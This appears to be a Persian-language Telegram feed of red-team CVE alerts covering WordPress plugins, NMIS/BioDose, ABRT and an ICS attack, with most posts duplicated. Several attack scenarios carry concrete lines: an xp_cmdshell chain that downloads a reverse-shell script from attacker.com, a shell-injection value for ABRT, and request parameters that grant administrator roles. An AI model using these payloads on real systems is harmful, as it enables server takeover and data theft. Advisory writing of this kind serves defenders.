3. با استفاده از کلید رمزنگاری پیشفرض و عمومیشده، بستههای داده رمزنگاریشده را به سادگی رمزگشایی میکند.
4. در این مرحله، مهاجم میتواند به صورت غیرفعال اطلاعات را مشاهده کند یا به صورت فعال، دستورات جعلی مانند
‘TRIP_CIRCUIT_BREAKER’ را به سیستم تزریق کرده و باعث قطع شدن یک مدارشکن و ایجاد اختلال در شبکه برق شود، در حالی که مرکز کنترل از این فرمان جعلی بیاطلاع است.---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13542
🔴 Risk Level: CRITICAL (Score: 9.8)
📜 شرح آسیبپذیری:
یک آسیبپذیری از نوع ارتقاء سطح دسترسی (Privilege Escalation) با شناسه
علت اصلی این آسیبپذیری، عدم اعتبارسنجی صحیح نقش کاربری (Role) در تابع
💥 میزان تأثیر:
مهاجم غیر احراز هویت شده (unauthenticated) - یعنی هر بازدیدکنندهای بدون نیاز به داشتن حساب کاربری - میتواند با ثبت یک حساب کاربری جدید، به صورت مستقیم به خود نقش مدیر کل (Administrator) را اختصاص دهد.
این امر به مهاجم کنترل کامل و مطلق بر روی وبسایت را میدهد. پیامدهای این حمله میتواند شامل موارد زیر باشد:
- نصب افزونههای مخرب و بدافزار
- تغییر محتوای کل سایت (Defacement)
- سرقت اطلاعات حساس کاربران و پایگاه داده
- حذف کامل وبسایت و اطلاعات آن
این آسیبپذیری به دلیل سهولت در بهرهبرداری و تأثیر بسیار بالا، دارای درجه حساسیت بحرانی (Critical) است.
🎭 سناریوی حمله:
۱. مهاجم یک وبسایت را که از نسخه آسیبپذیر افزونه
۲. مهاجم به صفحه ثبتنام عمومی وبسایت مراجعه میکند.
۳. هنگام پر کردن فرم ثبتنام، مهاجم با دستکاری درخواست ارسالی به سرور (بهعنوان مثال با استفاده از ابزاری مانند Burp Suite)، پارامتری را برای تعیین نقش کاربری به صورت
۴. از آنجایی که تابع مربوطه در سمت سرور هیچگونه بررسی برای نقش درخواستی انجام نمیدهد، درخواست را پردازش کرده و یک حساب کاربری جدید با سطح دسترسی مدیر کل برای مهاجم ایجاد میکند.
۵. مهاجم اکنون میتواند با اطلاعات حساب کاربری جدید خود وارد پنل مدیریت وردپرس شده و کنترل کامل سایت را در دست بگیرد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.8)
📜 شرح آسیبپذیری:
یک آسیبپذیری از نوع ارتقاء سطح دسترسی (Privilege Escalation) با شناسه
CVE-2025-13542 در افزونه وردپرسی DesignThemes LMS شناسایی شده است. این ضعف امنیتی تمام نسخههای این افزونه تا نسخه 1.0.4 (و شامل آن) را تحت تأثیر قرار میدهد.علت اصلی این آسیبپذیری، عدم اعتبارسنجی صحیح نقش کاربری (Role) در تابع
dtlms_register_user_front_end است. این تابع که مسئول فرآیند ثبتنام کاربران جدید در بخش عمومی سایت است، به کاربران اجازه میدهد تا هنگام ثبتنام، هر نقشی را برای حساب خود انتخاب کنند، بدون اینکه محدودیتی برای آن وجود داشته باشد.💥 میزان تأثیر:
مهاجم غیر احراز هویت شده (unauthenticated) - یعنی هر بازدیدکنندهای بدون نیاز به داشتن حساب کاربری - میتواند با ثبت یک حساب کاربری جدید، به صورت مستقیم به خود نقش مدیر کل (Administrator) را اختصاص دهد.
این امر به مهاجم کنترل کامل و مطلق بر روی وبسایت را میدهد. پیامدهای این حمله میتواند شامل موارد زیر باشد:
- نصب افزونههای مخرب و بدافزار
- تغییر محتوای کل سایت (Defacement)
- سرقت اطلاعات حساس کاربران و پایگاه داده
- حذف کامل وبسایت و اطلاعات آن
این آسیبپذیری به دلیل سهولت در بهرهبرداری و تأثیر بسیار بالا، دارای درجه حساسیت بحرانی (Critical) است.
🎭 سناریوی حمله:
۱. مهاجم یک وبسایت را که از نسخه آسیبپذیر افزونه
DesignThemes LMS استفاده میکند، شناسایی میکند.۲. مهاجم به صفحه ثبتنام عمومی وبسایت مراجعه میکند.
۳. هنگام پر کردن فرم ثبتنام، مهاجم با دستکاری درخواست ارسالی به سرور (بهعنوان مثال با استفاده از ابزاری مانند Burp Suite)، پارامتری را برای تعیین نقش کاربری به صورت
'role' : 'administrator' به درخواست خود اضافه میکند.۴. از آنجایی که تابع مربوطه در سمت سرور هیچگونه بررسی برای نقش درخواستی انجام نمیدهد، درخواست را پردازش کرده و یک حساب کاربری جدید با سطح دسترسی مدیر کل برای مهاجم ایجاد میکند.
۵. مهاجم اکنون میتواند با اطلاعات حساب کاربری جدید خود وارد پنل مدیریت وردپرس شده و کنترل کامل سایت را در دست بگیرد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
💯1
🚨 New Vulnerability Alert: CVE-2025-61940
🟠 Risk Level: HIGH (Score: 8.3)
📝 شرح آسیبپذیری:
آسیبپذیری با شناسه
اگرچه کاربران برای ورود به نرمافزار کلاینت، فرآیند احراز هویت با رمز عبور را طی میکنند، اما این کنترل دسترسی تنها در سطح خودِ اپلیکیشن اعمال میشود. اتصال اصلی به پایگاه داده، فارغ از هویت کاربر وارد شده، همواره با همان حساب کاربری قدرتمند و مشترک برقرار میگردد. این موضوع اصل «حداقل دسترسی لازم» یا Principle of Least Privilege را نقض میکند.
---
💥 تاثیر:
تاثیر اصلی این آسیبپذیری، دور زدن کامل کنترلهای دسترسی در سطح اپلیکیشن است. یک مهاجم که بتواند به هر نحوی به لایه ارتباطی بین کلاینت و پایگاه داده دسترسی پیدا کند، میتواند با سوءاستفاده از این اتصال مشترک، به تمامی اطلاعات موجود در دیتابیس دسترسی پیدا کند، آنها را تغییر دهد یا حذف کند.
پیامدهای بالقوه عبارتند از:
• نشت کامل اطلاعات (Full Data Breach): دسترسی غیرمجاز به تمامی دادههای حساس ذخیره شده.
• از دست رفتن یکپارچگی دادهها (Data Integrity Loss): امکان دستکاری و تغییر اطلاعات مهم.
• ارتقاء سطح دسترسی (Privilege Escalation): یک کاربر با دسترسی محدود در اپلیکیشن میتواند به سطح دسترسی کامل در پایگاه داده برسد.
---
🎭 سناریو:
یک سناریوی محتمل برای بهرهبرداری از این آسیبپذیری به شرح زیر است:
یک مهاجم داخلی (Insider Threat) یا یک مهاجم خارجی که موفق به نفوذ به شبکه داخلی سازمان شده است، ترافیک شبکه بین کلاینت
پس از به دست آوردن این اطلاعات، مهاجم دیگر نیازی به تعامل با اپلیکیشن کلاینت ندارد. او میتواند مستقیماً و با استفاده از ابزارهای مدیریت پایگاه داده (مانند SQL Server Management Studio)، به دیتابیس متصل شده و به دلیل سطح دسترسی بالای حساب کاربری مشترک، هرگونه عملیاتی را بدون هیچ محدودیتی بر روی دادهها انجام دهد. این حمله کاملاً از دید لاگهای اپلیکیشن پنهان میماند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.3)
📝 شرح آسیبپذیری:
آسیبپذیری با شناسه
CVE-2025-61940 در نرمافزار NMIS/BioDose نسخه V22.02 و قدیمیتر شناسایی شده است. این ضعف امنیتی ناشی از یک معماری نامناسب در مدیریت دسترسی به پایگاه داده است. در این نسخ، تمامی ارتباطات نرمافزار با پایگاه داده (SQL Server) از طریق یک حساب کاربری مشترک و با سطح دسترسی بالا انجام میشود.اگرچه کاربران برای ورود به نرمافزار کلاینت، فرآیند احراز هویت با رمز عبور را طی میکنند، اما این کنترل دسترسی تنها در سطح خودِ اپلیکیشن اعمال میشود. اتصال اصلی به پایگاه داده، فارغ از هویت کاربر وارد شده، همواره با همان حساب کاربری قدرتمند و مشترک برقرار میگردد. این موضوع اصل «حداقل دسترسی لازم» یا Principle of Least Privilege را نقض میکند.
---
💥 تاثیر:
تاثیر اصلی این آسیبپذیری، دور زدن کامل کنترلهای دسترسی در سطح اپلیکیشن است. یک مهاجم که بتواند به هر نحوی به لایه ارتباطی بین کلاینت و پایگاه داده دسترسی پیدا کند، میتواند با سوءاستفاده از این اتصال مشترک، به تمامی اطلاعات موجود در دیتابیس دسترسی پیدا کند، آنها را تغییر دهد یا حذف کند.
پیامدهای بالقوه عبارتند از:
• نشت کامل اطلاعات (Full Data Breach): دسترسی غیرمجاز به تمامی دادههای حساس ذخیره شده.
• از دست رفتن یکپارچگی دادهها (Data Integrity Loss): امکان دستکاری و تغییر اطلاعات مهم.
• ارتقاء سطح دسترسی (Privilege Escalation): یک کاربر با دسترسی محدود در اپلیکیشن میتواند به سطح دسترسی کامل در پایگاه داده برسد.
---
🎭 سناریو:
یک سناریوی محتمل برای بهرهبرداری از این آسیبپذیری به شرح زیر است:
یک مهاجم داخلی (Insider Threat) یا یک مهاجم خارجی که موفق به نفوذ به شبکه داخلی سازمان شده است، ترافیک شبکه بین کلاینت
NMIS/BioDose و سرور پایگاه داده را شنود (Sniff) میکند. با تحلیل ترافیک، مهاجم به راحتی میتواند اطلاعات مربوط به رشته اتصال (Connection String) را که حاوی نام کاربری و رمز عبور حساب مشترک SQL است، استخراج کند.پس از به دست آوردن این اطلاعات، مهاجم دیگر نیازی به تعامل با اپلیکیشن کلاینت ندارد. او میتواند مستقیماً و با استفاده از ابزارهای مدیریت پایگاه داده (مانند SQL Server Management Studio)، به دیتابیس متصل شده و به دلیل سطح دسترسی بالای حساب کاربری مشترک، هرگونه عملیاتی را بدون هیچ محدودیتی بر روی دادهها انجام دهد. این حمله کاملاً از دید لاگهای اپلیکیشن پنهان میماند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-62575
🟠 Risk Level: HIGH (Score: 8.3)
🔬 شرح آسیبپذیری:
آسیبپذیری با شناسه
به طور مشخص، حساب کاربری پایگاه داده با نام
💥 تأثیر:
خطرناکترین پیامد این آسیبپذیری، امکان اجرای کد از راه دور (Remote Code Execution - RCE) بر روی سرور میزبان پایگاه داده است. یک مهاجم که به هر نحوی به اطلاعات ورود این حساب کاربری دست یابد، میتواند با سوءاستفاده از دسترسی
این امر میتواند منجر به سناریوهای فاجعهباری از جمله کنترل کامل سرور، سرقت یا تخریب دادههای حساس، نصب بدافزار و باجافزار، و یا استفاده از سرور قربانی به عنوان نقطهای برای نفوذ به سایر بخشهای شبکه داخلی سازمان گردد.
🎭 سناریوی حمله:
یک سناریوی حمله محتمل میتواند به شکل زیر باشد:
۱. مهاجم از طریق یک ضعف دیگر (مانند یک آسیبپذیری SQL Injection در برنامه) یا با به دست آوردن اطلاعات ورود حساب
۲. پس از اتصال، مهاجم به دلیل داشتن دسترسی
۳. سپس، مهاجم از این رویه برای اجرای دستورات در خط فرمان سیستمعامل سرور استفاده میکند. برای مثال، با اجرای یک دستور ساده میتواند یک اسکریپت مخرب (Payload) را از سرور خود دانلود و بر روی سرور قربانی اجرا نماید:
۴. با اجرای این دستور، یک ارتباط معکوس (Reverse Shell) با سرور مهاجم برقرار شده و کنترل کامل سیستمعامل سرور در اختیار او قرار میگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.3)
🔬 شرح آسیبپذیری:
آسیبپذیری با شناسه
CVE-2025-62575 در نرمافزار NMIS/BioDose نسخههای V22.02 و قدیمیتر شناسایی شده است. ریشه این مشکل در پیکربندی ناامن و پیشفرض پایگاه داده Microsoft SQL Server است که توسط این نرمافزار استفاده میشود.به طور مشخص، حساب کاربری پایگاه داده با نام
nmdbuser (و سایر حسابهای ایجاد شده به صورت پیشفرض) دارای نقش sysadmin است. این نقش، بالاترین سطح دسترسی در SQL Server محسوب میشود و به این حساب کاربری اجازه انجام هرگونه عملیاتی را بر روی سرور پایگاه داده میدهد. اعطای چنین دسترسی بالایی به یک حساب کاربری اپلیکیشن، یک نقص امنیتی جدی و برخلاف اصل «حداقل دسترسی لازم» (Principle of Least Privilege) است.💥 تأثیر:
خطرناکترین پیامد این آسیبپذیری، امکان اجرای کد از راه دور (Remote Code Execution - RCE) بر روی سرور میزبان پایگاه داده است. یک مهاجم که به هر نحوی به اطلاعات ورود این حساب کاربری دست یابد، میتواند با سوءاستفاده از دسترسی
sysadmin، دستورات دلخواه خود را بر روی سیستمعامل سرور اجرا کند.این امر میتواند منجر به سناریوهای فاجعهباری از جمله کنترل کامل سرور، سرقت یا تخریب دادههای حساس، نصب بدافزار و باجافزار، و یا استفاده از سرور قربانی به عنوان نقطهای برای نفوذ به سایر بخشهای شبکه داخلی سازمان گردد.
🎭 سناریوی حمله:
یک سناریوی حمله محتمل میتواند به شکل زیر باشد:
۱. مهاجم از طریق یک ضعف دیگر (مانند یک آسیبپذیری SQL Injection در برنامه) یا با به دست آوردن اطلاعات ورود حساب
nmdbuser از طریق روشهای دیگر، به پایگاه داده متصل میشود.۲. پس از اتصال، مهاجم به دلیل داشتن دسترسی
sysadmin، قادر است تا رویههای ذخیرهشده (Stored Procedures) سیستمی و قدرتمند مانند xp_cmdshell را که به طور پیشفرض ممکن است غیرفعال باشند، فعالسازی کند.۳. سپس، مهاجم از این رویه برای اجرای دستورات در خط فرمان سیستمعامل سرور استفاده میکند. برای مثال، با اجرای یک دستور ساده میتواند یک اسکریپت مخرب (Payload) را از سرور خود دانلود و بر روی سرور قربانی اجرا نماید:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;EXEC xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(\'https://attacker.com/reverse_shell.ps1\')"'۴. با اجرای این دستور، یک ارتباط معکوس (Reverse Shell) با سرور مهاجم برقرار شده و کنترل کامل سیستمعامل سرور در اختیار او قرار میگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-64298
🟠 Risk Level: HIGH (Score: 8.4)
گزارش تحلیل آسیبپذیری
---
شرح آسیبپذیری:
آسیبپذیری با شناسه
بهطور پیشفرض، دایرکتوری اشتراکگذاری شده در ویندوز (Windows share) که برای دسترسی کلاینتها در شبکههای نصبشده استفاده میشود، دارای مجوزهای دسترسی ناامن است. این ضعف امنیتی به کاربران غیرمجاز در شبکه اجازه میدهد تا به فایلهای پایگاه داده SQL Server و فایلهای پیکربندی که ممکن است حاوی اطلاعات حساس باشند، دسترسی پیدا کنند.
---
تاثیر:
بهرهبرداری موفقیتآمیز از این آسیبپذیری میتواند منجر به عواقب جدی امنیتی شود:
نشت اطلاعات حساس: مهاجمان میتوانند به فایلهای پایگاه داده و پیکربندی دسترسی پیدا کرده و اطلاعات محرمانه مانند دادههای کاربران، تنظیمات سیستم و اسرار تجاری را استخراج کنند.
نقض تمامیت دادهها: با دسترسی به فایلهای پایگاه داده، امکان تغییر یا حذف دادهها وجود دارد که میتواند عملکرد نرمافزار را مختل کرده و به اعتبار دادهها آسیب بزند.
افزایش سطح دسترسی: در صورتی که فایلهای پیکربندی حاوی اطلاعات اعتبارسنجی (مانند رمزهای عبور با هش ضعیف) باشند، مهاجم میتواند از آنها برای دسترسی به سایر بخشهای سیستم یا شبکه استفاده کند.
---
سناریو:
یک مهاجم با دسترسی اولیه به شبکه داخلی سازمان، شروع به اسکن شبکههای اشتراکگذاری شده (shares) میکند.
مهاجم دایرکتوری ناامن مربوط به نصب
سپس، فایلهای پایگاه داده (با پسوند
در محیطی آفلاین و امن، مهاجم پایگاه داده را به یک نمونه SQL Server متصل کرده و تمام جداول و دادههای حساس موجود در آن را استخراج میکند. این اطلاعات میتواند برای حملات بعدی یا فروش در بازار سیاه مورد استفاده قرار گیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.4)
گزارش تحلیل آسیبپذیری
CVE-2025-64298---
شرح آسیبپذیری:
آسیبپذیری با شناسه
CVE-2025-64298 در نرمافزار NMIS/BioDose نسخه V22.02 و قدیمیتر شناسایی شده است. این مشکل مربوط به نصبهایی است که از نسخه تعبیهشده Microsoft SQL Server Express استفاده میکنند.بهطور پیشفرض، دایرکتوری اشتراکگذاری شده در ویندوز (Windows share) که برای دسترسی کلاینتها در شبکههای نصبشده استفاده میشود، دارای مجوزهای دسترسی ناامن است. این ضعف امنیتی به کاربران غیرمجاز در شبکه اجازه میدهد تا به فایلهای پایگاه داده SQL Server و فایلهای پیکربندی که ممکن است حاوی اطلاعات حساس باشند، دسترسی پیدا کنند.
---
تاثیر:
بهرهبرداری موفقیتآمیز از این آسیبپذیری میتواند منجر به عواقب جدی امنیتی شود:
نشت اطلاعات حساس: مهاجمان میتوانند به فایلهای پایگاه داده و پیکربندی دسترسی پیدا کرده و اطلاعات محرمانه مانند دادههای کاربران، تنظیمات سیستم و اسرار تجاری را استخراج کنند.
نقض تمامیت دادهها: با دسترسی به فایلهای پایگاه داده، امکان تغییر یا حذف دادهها وجود دارد که میتواند عملکرد نرمافزار را مختل کرده و به اعتبار دادهها آسیب بزند.
افزایش سطح دسترسی: در صورتی که فایلهای پیکربندی حاوی اطلاعات اعتبارسنجی (مانند رمزهای عبور با هش ضعیف) باشند، مهاجم میتواند از آنها برای دسترسی به سایر بخشهای سیستم یا شبکه استفاده کند.
---
سناریو:
یک مهاجم با دسترسی اولیه به شبکه داخلی سازمان، شروع به اسکن شبکههای اشتراکگذاری شده (shares) میکند.
مهاجم دایرکتوری ناامن مربوط به نصب
NMIS/BioDose را کشف میکند که به دلیل مجوزهای ضعیف، برای همه کاربران شبکه قابل خواندن است.سپس، فایلهای پایگاه داده (با پسوند
.mdf) و فایلهای پیکربندی را به سیستم خود کپی میکند.در محیطی آفلاین و امن، مهاجم پایگاه داده را به یک نمونه SQL Server متصل کرده و تمام جداول و دادههای حساس موجود در آن را استخراج میکند. این اطلاعات میتواند برای حملات بعدی یا فروش در بازار سیاه مورد استفاده قرار گیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13486
🔴 Risk Level: CRITICAL (Score: 9.8)
تحلیل آسیبپذیری: CVE-2025-13486
اجرای کد از راه دور در پلاگین ACF: Extended وردپرس
---
شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع اجرای کد از راه دور (RCE) با شناسه
آسیبپذیری ناشی از تابع
تأثیر:
موفقیتآمیز بودن این حمله میتواند منجر به کنترل کامل وبسایت و سرور میزبان شود. برخی از اثرات کلیدی عبارتند از:
- اجرای کد دلخواه: مهاجم میتواند هر دستوری را روی سرور اجرا کند.
- نصب Backdoor: امکان نصب دربهای پشتی (Backdoor) برای حفظ دسترسی پایدار به سیستم.
- ایجاد کاربر مدیر: مهاجم قادر به ایجاد حسابهای کاربری جدید با سطح دسترسی مدیر (Administrator) خواهد بود.
- سرقت اطلاعات: دسترسی کامل به پایگاه داده، فایلهای وبسایت و اطلاعات حساس کاربران.
- تخریب وبسایت: امکان تغییر محتوا، حذف اطلاعات یا از دسترس خارج کردن کامل سایت.
سناریو:
یک مهاجم، وبسایتی را که از نسخه آسیبپذیر پلاگین ACF: Extended استفاده میکند، شناسایی میکند. سپس، یک درخواست HTTP خاص و دستکاریشده را به سمت سرور ارسال میکند. این درخواست حاوی یک Payload مخرب است که تابع
تابع آسیبپذیر، این Payload را به عنوان ورودی معتبر پذیرفته و آن را به
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.8)
تحلیل آسیبپذیری: CVE-2025-13486
اجرای کد از راه دور در پلاگین ACF: Extended وردپرس
---
شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع اجرای کد از راه دور (RCE) با شناسه
CVE-2025-13486 در پلاگین Advanced Custom Fields: Extended برای وردپرس شناسایی شده است. این ضعف امنیتی نسخههای 0.9.0.5 تا 0.9.1.1 را تحت تأثیر قرار میدهد.آسیبپذیری ناشی از تابع
prepare_form() است که ورودی دریافت شده از کاربر را بدون اعتبارسنجی و پاکسازی کافی، مستقیماً به تابع call_user_func_array() ارسال میکند. این امر به مهاجمان احراز هویت نشده اجازه میدهد تا با ارسال درخواستهای دستکاریشده، کد دلخواه خود را بر روی سرور اجرا کنند.تأثیر:
موفقیتآمیز بودن این حمله میتواند منجر به کنترل کامل وبسایت و سرور میزبان شود. برخی از اثرات کلیدی عبارتند از:
- اجرای کد دلخواه: مهاجم میتواند هر دستوری را روی سرور اجرا کند.
- نصب Backdoor: امکان نصب دربهای پشتی (Backdoor) برای حفظ دسترسی پایدار به سیستم.
- ایجاد کاربر مدیر: مهاجم قادر به ایجاد حسابهای کاربری جدید با سطح دسترسی مدیر (Administrator) خواهد بود.
- سرقت اطلاعات: دسترسی کامل به پایگاه داده، فایلهای وبسایت و اطلاعات حساس کاربران.
- تخریب وبسایت: امکان تغییر محتوا، حذف اطلاعات یا از دسترس خارج کردن کامل سایت.
سناریو:
یک مهاجم، وبسایتی را که از نسخه آسیبپذیر پلاگین ACF: Extended استفاده میکند، شناسایی میکند. سپس، یک درخواست HTTP خاص و دستکاریشده را به سمت سرور ارسال میکند. این درخواست حاوی یک Payload مخرب است که تابع
prepare_form() را هدف قرار میدهد.تابع آسیبپذیر، این Payload را به عنوان ورودی معتبر پذیرفته و آن را به
call_user_func_array() پاس میدهد. در نتیجه، کد مخرب تعبیهشده توسط مهاجم (مثلاً یک دستور برای ایجاد یک فایل PHP جهت آپلود فایلهای دیگر یا ایجاد یک کاربر مدیر جدید) بر روی سرور اجرا میشود. پس از این مرحله، مهاجم کنترل کاملی بر روی وبسایت خواهد داشت بدون آنکه نیاز به هیچگونه نام کاربری یا رمز عبوری داشته باشد.🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12744
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری CVE-2025-12744
افزایش سطح دسترسی از طریق تزریق دستور در ABRT
📝 توضیحات آسیبپذیری:
یک نقص امنیتی حیاتی در دیمن `ABRT` در نحوه پردازش اطلاعات `mount` که از سوی کاربر ارائه میشود، شناسایی شده است. این سرویس تا ۱۲ کاراکتر از ورودی غیرقابل اعتماد را کپی کرده و بدون اعتبارسنجی مناسب، آن را مستقیماً در یک دستور شل (
این ضعف در اعتبارسنجی ورودی به مهاجم اجازه میدهد تا متاکاراکترهای شل (Shell Metacharacters) را به دستور اصلی تزریق کرده و دستورات مخرب خود را اجرا نماید.
💥 تاثیر:
این آسیبپذیری از نوع تزریق دستور (Command Injection) است و پیامد اصلی آن افزایش سطح دسترسی (Privilege Escalation) میباشد.
یک کاربر محلی با دسترسی محدود میتواند با ساخت یک ورودی خاص، دستورات دلخواه خود را با سطح دسترسی کامل `root` بر روی سیستم اجرا کند و در نهایت کنترل کامل سیستم هدف را به دست آورد.
⚙️ سناریو:
یک مهاجم با یک حساب کاربری عادی در سیستم هدف، یک ورودی مخرب (مثلاً نام یک کانتینر یا شناسه مرتبط) را ایجاد میکند که حاوی دستورات شل باشد.
برای مثال، مهاجم یک ورودی مانند
هنگامی که سرویس `ABRT` تلاش میکند تا این ورودی را با دستور
مهاجم میتواند با جایگزین کردن دستور `id` با دستورات پیچیدهتر، مانند ایجاد یک reverse shell، به طور کامل به سیستم نفوذ کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری CVE-2025-12744
افزایش سطح دسترسی از طریق تزریق دستور در ABRT
📝 توضیحات آسیبپذیری:
یک نقص امنیتی حیاتی در دیمن `ABRT` در نحوه پردازش اطلاعات `mount` که از سوی کاربر ارائه میشود، شناسایی شده است. این سرویس تا ۱۲ کاراکتر از ورودی غیرقابل اعتماد را کپی کرده و بدون اعتبارسنجی مناسب، آن را مستقیماً در یک دستور شل (
docker inspect %s) قرار میدهد.این ضعف در اعتبارسنجی ورودی به مهاجم اجازه میدهد تا متاکاراکترهای شل (Shell Metacharacters) را به دستور اصلی تزریق کرده و دستورات مخرب خود را اجرا نماید.
💥 تاثیر:
این آسیبپذیری از نوع تزریق دستور (Command Injection) است و پیامد اصلی آن افزایش سطح دسترسی (Privilege Escalation) میباشد.
یک کاربر محلی با دسترسی محدود میتواند با ساخت یک ورودی خاص، دستورات دلخواه خود را با سطح دسترسی کامل `root` بر روی سیستم اجرا کند و در نهایت کنترل کامل سیستم هدف را به دست آورد.
⚙️ سناریو:
یک مهاجم با یک حساب کاربری عادی در سیستم هدف، یک ورودی مخرب (مثلاً نام یک کانتینر یا شناسه مرتبط) را ایجاد میکند که حاوی دستورات شل باشد.
برای مثال، مهاجم یک ورودی مانند
a;id>/tmp/p را ایجاد میکند.هنگامی که سرویس `ABRT` تلاش میکند تا این ورودی را با دستور
docker inspect a;id>/tmp/p پردازش کند، به دلیل وجود متاکاراکتر ;، سیستمعامل ابتدا دستور docker inspect a و سپس دستور id>/tmp/p را اجرا میکند. از آنجایی که `ABRT` با دسترسی `root` اجرا میشود، دستور `id` نیز با همین سطح دسترسی اجرا شده و خروجی آن (که uid=0(root) است) در فایل /tmp/p ذخیره میشود.مهاجم میتواند با جایگزین کردن دستور `id` با دستورات پیچیدهتر، مانند ایجاد یک reverse shell، به طور کامل به سیستم نفوذ کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13342
🔴 Risk Level: CRITICAL (Score: 9.8)
تحلیل آسیبپذیری: CVE-2025-13342
تغییر غیرمجاز تنظیمات وردپرس در افزونه Frontend Admin
---
Vulnerability Description:
آسیبپذیری با شناسه
این مشکل به دلیل عدم وجود بررسیهای کافی برای سطح دسترسی کاربر (Insufficient Capability Checks) و اعتبارسنجی ضعیف ورودیها در تابع
Impact:
تأثیر اصلی این آسیبپذیری، دادن کنترل بر تنظیمات کلیدی هسته وردپرس به مهاجم است. این امر میتواند منجر به سناریوهای خطرناکی از جمله تصاحب کامل وبسایت (Full Site Takeover) شود.
مهاجم میتواند گزینههای زیر را تغییر دهد:
▪️
▪️
▪️
ترکیب این موارد به مهاجم اجازه میدهد تا یک حساب کاربری با سطح دسترسی مدیر برای خود ایجاد کرده و کنترل کامل سایت را در دست بگیرد.
Scenario:
یک سناریوی حمله محتمل به شرح زیر است:
۱. مهاجم یک وبسایت وردپرسی را پیدا میکند که از نسخه آسیبپذیر افزونه
۲. مهاجم یک درخواست وب دستکاریشده (Crafted Request) به سمت سرور ارسال میکند. در این درخواست، پارامترهایی با نامهای مشابه تنظیمات وردپرس مانند
۳. به دلیل ضعف امنیتی در افزونه، این درخواست بدون بررسی سطح دسترسی پردازش شده و مقادیر ارسالشده توسط مهاجم مستقیماً در جدول تنظیمات وردپرس (
۴. اکنون، قابلیت ثبتنام در سایت فعال شده و نقش پیشفرض برای هر کاربر جدید، "مدیر کل" است. مهاجم به سادگی به صفحه ثبتنام سایت مراجعه کرده، یک حساب کاربری جدید ایجاد میکند و بلافاصله به پیشخوان وردپرس با بالاترین سطح دسترسی وارد میشود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.8)
تحلیل آسیبپذیری: CVE-2025-13342
تغییر غیرمجاز تنظیمات وردپرس در افزونه Frontend Admin
---
Vulnerability Description:
آسیبپذیری با شناسه
CVE-2025-13342 در افزونه Frontend Admin by DynamiApps برای وردپرس شناسایی شده است. تمام نسخههای این افزونه تا نسخه 3.28.20 (شامل این نسخه) تحت تأثیر این ضعف امنیتی قرار دارند.این مشکل به دلیل عدم وجود بررسیهای کافی برای سطح دسترسی کاربر (Insufficient Capability Checks) و اعتبارسنجی ضعیف ورودیها در تابع
ActionOptions::run() به وجود آمده است. این نقص به یک مهاجم احراز هویت نشده اجازه میدهد تا با ارسال دادههای دستکاریشده از طریق فرمهای عمومی که با این افزونه ساخته شدهاند، گزینههای حیاتی وردپرس را بهصورت غیرمجاز تغییر دهد.Impact:
تأثیر اصلی این آسیبپذیری، دادن کنترل بر تنظیمات کلیدی هسته وردپرس به مهاجم است. این امر میتواند منجر به سناریوهای خطرناکی از جمله تصاحب کامل وبسایت (Full Site Takeover) شود.
مهاجم میتواند گزینههای زیر را تغییر دهد:
▪️
users_can_register: فعالسازی قابلیت ثبتنام عمومی کاربران در سایت.▪️
default_role: تعیین نقش کاربری پیشفرض برای کاربران جدید (مثلاً تغییر آن به Administrator).▪️
admin_email: تغییر ایمیل مدیر اصلی سایت که میتواند به قفل شدن مدیر واقعی و فرآیند بازنشانی رمز عبور برای مهاجم منجر شود.ترکیب این موارد به مهاجم اجازه میدهد تا یک حساب کاربری با سطح دسترسی مدیر برای خود ایجاد کرده و کنترل کامل سایت را در دست بگیرد.
Scenario:
یک سناریوی حمله محتمل به شرح زیر است:
۱. مهاجم یک وبسایت وردپرسی را پیدا میکند که از نسخه آسیبپذیر افزونه
